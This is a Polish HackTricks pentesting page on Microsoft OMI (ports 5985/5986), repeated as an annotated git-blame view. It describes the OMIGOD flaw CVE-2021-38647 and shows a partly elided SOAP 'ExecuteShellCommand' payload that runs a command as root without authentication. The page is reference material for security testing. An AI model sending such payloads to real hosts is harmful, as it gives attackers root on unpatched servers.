hacktricks/network-services-pentesting/5985-5986-pentesting-omi.md

# 5985,5986 - Testowanie penetracyjne OMI

<details>

<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć swoją **firmę reklamowaną w HackTricks**? A może chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLAN SUBSKRYPCYJNY**](https://github.com/sponsors/carlospolop)!
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do repozytorium [hacktricks](https://github.com/carlospolop/hacktricks) i [hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.

</details>

### **Podstawowe informacje**

**OMI** jest prezentowane jako narzędzie **[open-source](https://github.com/microsoft/omi)** stworzone przez Microsoft, przeznaczone do zdalnego zarządzania konfiguracją. Jest szczególnie istotne dla serwerów Linux w chmurze Azure, które korzystają z usług takich jak:

- **Azure Automation**
- **Azure Automatic Update**
- **Azure Operations Management Suite**
- **Azure Log Analytics**
- **Azure Configuration Management**
- **Azure Diagnostics**

Proces `omiengine` jest uruchamiany i nasłuchuje na wszystkich interfejsach jako root, gdy te usługi są aktywowane.

**Domyślne porty** używane to **5985** (http) i **5986** (https).

### **[CVE-2021-38647 Podatność](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647)**

Jak zaobserwowano 16 września, serwery Linux w chmurze Azure z wymienionymi usługami są podatne ze względu na podatną wersję OMI. Podatność ta polega na nieprawidłowym autoryzowaniu klienta przez serwer OMI przy obsłudze wiadomości przez punkt końcowy `/wsman` bez wymagania nagłówka uwierzytelniającego.

Atakujący może wykorzystać to, wysyłając ładunek SOAP "ExecuteShellCommand" bez nagłówka uwierzytelniającego, zmuszając serwer do wykonywania poleceń z uprawnieniami roota.
```xml
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>
```
Aby uzyskać więcej informacji na temat tej CVE **[sprawdź to](https://github.com/horizon3ai/CVE-2021-38647)**.

## Odwołania

* [https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/](https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/)
* [https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/](https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/)

<details>

<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Czy pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć swoją **firmę reklamowaną w HackTricks**? A może chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)!
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do repozytorium [hacktricks](https://github.com/carlospolop/hacktricks) i [hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.

</details>
Translated to Polish 2024-02-11 01:46:25 +00:00			`# 5985,5986 - Testowanie penetracyjne OMI`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

Translated to Polish 2024-02-11 01:46:25 +00:00			`<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Polish 2024-02-11 01:46:25 +00:00			`* Pracujesz w firmie zajmującej się cyberbezpieczeństwem? Chcesz zobaczyć swoją firmę reklamowaną w HackTricks? A może chcesz mieć dostęp do najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF? Sprawdź [PLAN SUBSKRYPCYJNY](https://github.com/sponsors/carlospolop)!`
			`* Odkryj [Rodzinę PEASS](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [NFT](https://opensea.io/collection/the-peass-family)`
			`* Zdobądź [oficjalne gadżety PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Dołącz do [💬](https://emojipedia.org/speech-balloon/) [grupy Discord](https://discord.gg/hRep4RUj7f) lub [grupy telegramowej](https://t.me/peass) lub śledź mnie na Twitterze 🐦[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do repozytorium [hacktricks](https://github.com/carlospolop/hacktricks) i [hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

Translated to Polish 2024-02-11 01:46:25 +00:00			`### Podstawowe informacje`
GitBook: [#2980] No subject 2022-02-02 14:36:35 +00:00
Translated to Polish 2024-02-11 01:46:25 +00:00			`OMI jest prezentowane jako narzędzie [open-source](https://github.com/microsoft/omi) stworzone przez Microsoft, przeznaczone do zdalnego zarządzania konfiguracją. Jest szczególnie istotne dla serwerów Linux w chmurze Azure, które korzystają z usług takich jak:`
GitBook: [#2980] No subject 2022-02-02 14:36:35 +00:00
a 2024-02-08 21:36:35 +00:00			`- Azure Automation`
			`- Azure Automatic Update`
			`- Azure Operations Management Suite`
			`- Azure Log Analytics`
			`- Azure Configuration Management`
			`- Azure Diagnostics`
GitBook: [#2980] No subject 2022-02-02 14:36:35 +00:00
Translated to Polish 2024-02-11 01:46:25 +00:00			Proces `omiengine` jest uruchamiany i nasłuchuje na wszystkich interfejsach jako root, gdy te usługi są aktywowane.
GitBook: [#2980] No subject 2022-02-02 14:36:35 +00:00
Translated to Polish 2024-02-11 01:46:25 +00:00			`Domyślne porty używane to 5985 (http) i 5986 (https).`
GitBook: [#2980] No subject 2022-02-02 14:36:35 +00:00
Translated to Polish 2024-02-11 01:46:25 +00:00			`### [CVE-2021-38647 Podatność](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647)`
GitBook: [#2980] No subject 2022-02-02 14:36:35 +00:00
Translated to Polish 2024-02-11 01:46:25 +00:00			Jak zaobserwowano 16 września, serwery Linux w chmurze Azure z wymienionymi usługami są podatne ze względu na podatną wersję OMI. Podatność ta polega na nieprawidłowym autoryzowaniu klienta przez serwer OMI przy obsłudze wiadomości przez punkt końcowy `/wsman` bez wymagania nagłówka uwierzytelniającego.
GitBook: [#2980] No subject 2022-02-02 14:36:35 +00:00
Translated to Polish 2024-02-11 01:46:25 +00:00			`Atakujący może wykorzystać to, wysyłając ładunek SOAP "ExecuteShellCommand" bez nagłówka uwierzytelniającego, zmuszając serwer do wykonywania poleceń z uprawnieniami roota.`
GitBook: [#2980] No subject 2022-02-02 14:36:35 +00:00			```xml
			`<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"`
Translated to Polish 2024-02-11 01:46:25 +00:00			`...`
			`<s:Body>`
			`<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">`
			`<p:command>id</p:command>`
			`<p:timeout>0</p:timeout>`
			`</p:ExecuteShellCommand_INPUT>`
			`</s:Body>`
GitBook: [#2980] No subject 2022-02-02 14:36:35 +00:00			`</s:Envelope>`
			```
Translated to Polish 2024-02-11 01:46:25 +00:00			`Aby uzyskać więcej informacji na temat tej CVE [sprawdź to](https://github.com/horizon3ai/CVE-2021-38647).`
GitBook: [#2980] No subject 2022-02-02 14:36:35 +00:00
Translated to Polish 2024-02-11 01:46:25 +00:00			`## Odwołania`
GitBook: [#2980] No subject 2022-02-02 14:36:35 +00:00
			`* [https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/](https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/)`
			`* [https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/](https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

Translated to Polish 2024-02-11 01:46:25 +00:00			`<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Polish 2024-02-11 01:46:25 +00:00			`* Czy pracujesz w firmie zajmującej się cyberbezpieczeństwem? Chcesz zobaczyć swoją firmę reklamowaną w HackTricks? A może chcesz mieć dostęp do najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF? Sprawdź [PLAN SUBSKRYPCJI](https://github.com/sponsors/carlospolop)!`
			`* Odkryj [Rodzinę PEASS](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [NFT](https://opensea.io/collection/the-peass-family)`
			`* Zdobądź [oficjalne gadżety PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Dołącz do [💬](https://emojipedia.org/speech-balloon/) [grupy Discord](https://discord.gg/hRep4RUj7f) lub [grupy telegramowej](https://t.me/peass) lub śledź mnie na Twitterze 🐦[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do repozytorium [hacktricks](https://github.com/carlospolop/hacktricks) i [hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`